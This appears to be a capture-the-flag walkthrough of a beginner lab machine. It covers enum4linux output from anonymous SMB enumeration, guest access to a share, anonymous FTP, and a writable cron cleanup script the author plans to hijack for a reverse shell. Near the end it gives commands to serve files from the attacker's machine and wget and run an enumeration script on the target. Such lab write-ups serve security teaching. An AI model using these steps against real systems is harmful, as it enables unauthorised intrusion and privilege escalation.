Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.
For more information on Linux, check out https://tryhackme.com/room/zthlinux
As you can see NMAP gives a simple but a somewhat detailed output of the scan.
It shows us which shares are available, the users that have access to those shares and smb-ls displays us the content in the shares that we can access as guest.
========================== |TargetInformation| ========================== Target...........10.10.128.142RIDRange........500-550,1000-1050Username.........''Password.........''KnownUsernames..administrator,guest,krbtgt,domainadmins,root,bin,none ===================================================== |EnumeratingWorkgroup/Domainon10.10.128.142| ===================================================== [+] Got domain/workgroup name: WORKGROUP ============================================= |NbtstatInformationfor10.10.128.142| ============================================= Lookingupstatusof10.10.128.142ANONYMOUS<00>-B<ACTIVE>WorkstationServiceANONYMOUS<03>-B<ACTIVE>MessengerServiceANONYMOUS<20>-B<ACTIVE>FileServerService..__MSBROWSE__. <01>-<GROUP>B<ACTIVE>MasterBrowserWORKGROUP<00>-<GROUP>B<ACTIVE>Domain/WorkgroupNameWORKGROUP<1d>-B<ACTIVE>MasterBrowserWORKGROUP<1e>-<GROUP>B<ACTIVE>BrowserServiceElectionsMACAddress=00-00-00-00-00-00 ====================================== |SessionCheckon10.10.128.142| ====================================== [+] Server 10.10.128.142 allows sessions using username '', password '' ============================================ |GettingdomainSIDfor10.10.128.142| ============================================ DomainName:WORKGROUPDomainSid: (NULL SID)[+] Can't determine if host is part of domain or part of a workgroup ======================================= | OS information on 10.10.128.142 | ======================================= Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.[+] Got OS info for 10.10.128.142 from smbclient: [+] Got OS info for 10.10.128.142 from srvinfo: ANONYMOUS Wk Sv PrQ Unx NT SNT anonymous server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03 ============================== | Users on 10.10.128.142 | ============================== index: 0x1 RID: 0x3eb acb: 0x00000010 Account: [REDACTED] Name: [REDACTED] Desc: user:[[REDACTED]] rid:[0x3eb] ========================================== | Share Enumeration on 10.10.128.142 | ========================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers [REDACTED] Disk My SMB Share Directory for [REDACTED] IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))SMB1 disabled -- no workgroup available[+] Attempting to map shares on 10.10.128.142//10.10.128.142/print$ Mapping: DENIED, Listing: N/A//10.10.128.142/[REDACTED] Mapping: OK, Listing: OK//10.10.128.142/IPC$ [E] Can't understand response:NT_STATUS_OBJECT_NAME_NOT_FOUNDlisting \* ===================================================== |PasswordPolicyInformationfor10.10.128.142| ===================================================== [+] Attaching to 10.10.128.142 using a NULL share[+] Trying protocol 139/SMB...[+] Found domain(s): [+] ANONYMOUS [+] Builtin[+] Password Info for Domain: ANONYMOUS [+] Minimumpasswordlength:5 [+] Passwordhistorylength:None [+] Maximumpasswordage:37days6hours21minutes [+] PasswordComplexityFlags:000000 [+] DomainRefusePasswordChange:0 [+] DomainPasswordStoreCleartext:0 [+] DomainPasswordLockoutAdmins:0 [+] DomainPasswordNoClearChange:0 [+] DomainPasswordNoAnonChange:0 [+] DomainPasswordComplex:0 [+] Minimumpasswordage:None [+] ResetAccountLockoutCounter:30minutes [+] LockedAccountDuration:30minutes [+] AccountLockoutThreshold:None [+] ForcedLogoffTime:37days6hours21minutes[+] Retieved partial password policy with rpcclient:PasswordComplexity:DisabledMinimumPasswordLength:5 =============================== |Groupson10.10.128.142| =============================== [+] Getting builtin groups:[+] Getting builtin group memberships:[+] Getting local groups:[+] Getting local group memberships:[+] Getting domain groups:[+] Getting domain group memberships: ======================================================================== |Userson10.10.128.142viaRIDcycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1[I] Found new SID: S-1-5-21-2144577014-3591677122-2188425437[I] Found new SID: S-1-5-32[+] Enumerating users using SID S-1-22-1 and logon username '', password ''S-1-22-1-1000UnixUser\[REDACTED] (Local User)[+] Enumerating users using SID S-1-5-32 and logon username '', password ''S-1-5-32-544BUILTIN\Administrators (Local Group)S-1-5-32-545BUILTIN\Users (Local Group)S-1-5-32-546BUILTIN\Guests (Local Group)S-1-5-32-547BUILTIN\PowerUsers (Local Group)S-1-5-32-548BUILTIN\AccountOperators (Local Group)S-1-5-32-549BUILTIN\ServerOperators (Local Group)S-1-5-32-550BUILTIN\PrintOperators (Local Group)[+] Enumerating users using SID S-1-5-21-2144577014-3591677122-2188425437 and logon username '', password ''S-1-5-21-2144577014-3591677122-2188425437-501ANONYMOUS\nobody (Local User)S-1-5-21-2144577014-3591677122-2188425437-513ANONYMOUS\None (Domain Group)S-1-5-21-2144577014-3591677122-2188425437-1003ANONYMOUS\[REDACTED] (Local User) ============================================== |Gettingprinterinfofor10.10.128.142| ============================================== Noprintersreturned.
For the sake of space, I have removed some useless information from the output and left out only the important bits. Your output will have a lot of more information.
With this you get the answer to the Fourth question of Task 1.
From the info we have gathered we can see that there is a share that we can access as a guest and one user.
smbclient'\\10.10.128.142\[REDACTED]'EnterWORKGROUP\users's password: (JUST LEAVE IT BLANK)Try "help" to get a list of possible commands.smb: \> ls . D 0 Sun May 17 13:11:34 2020 .. D 0 Thu May 14 03:59:10 2020 [REDACTED].jpg N 42663 Tue May 12 02:43:42 2020 [REDACTED].jpeg N 265188 Tue May 12 02:43:42 2020 20508240 blocks of size 1024. 13306640 blocks availablesmb: \>
Type help to get more information about the commands you can use in smb.
There are two adorable pictures that we can get, however there isn't much information we can get from them with steghide since they require a password.
Now lets get our attention to FTP.
As previously shown from NMAP, we can login to FTP as anonymous (big surprise there x0 )
tp $targetConnectedto10.10.128.142.220 [REDACTED]'s FTP Server!Name (10.10.128.142:magic): anonymous331 Please specify the password.Password: (LEAVE BLANK)230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts226 Directory send OK.ftp>
catclean.sh#!/bin/bashtmp_files=0echo $tmp_filesif [ $tmp_files=0 ]thenecho"Running cleanup script: nothing to delete">>/var/ftp/scripts/removed_files.logelsefor LINE in $tmp_files; dorm-rf/tmp/$LINE &&echo"$(date) | Removed file /tmp/$LINE">>/var/ftp/scripts/removed_files.log;donefi
Looking through them, we see that to_do.txt is just a simple note, however removed_files.log and clean.sh are tied. Examining clean.sh, the script removes all files in the /tmp directory and outputs the logs in /var/ftp/scripts/removed_files.log. Judging by this, clean.sh is probably a cronjob that executes once every few minutes, hours, days, etc. (For more info about cronjobs https://ostechnix.com/a-beginners-guide-to-cron-jobs/)
Reverse Shell
If clean.sh is a cron task, we can use this to get a reverse shell, by simply modifying the file and upload it back to the scripts folder.
python3-mhttp.server (on ourmachine)wgethttp://$your_ip:$port/path/to/scripts (on remotetarget)chmod+xscript.to.use.sh./execute.script.sh|teeenum.txt
(the last command piping it into tee is good to save the output in a file so that you don't have to rerun the script again if you lose the information, however it is also bad as it leaves traces of your steps).
The output of LinEnum is quite large so I'll just put in the important info that we need.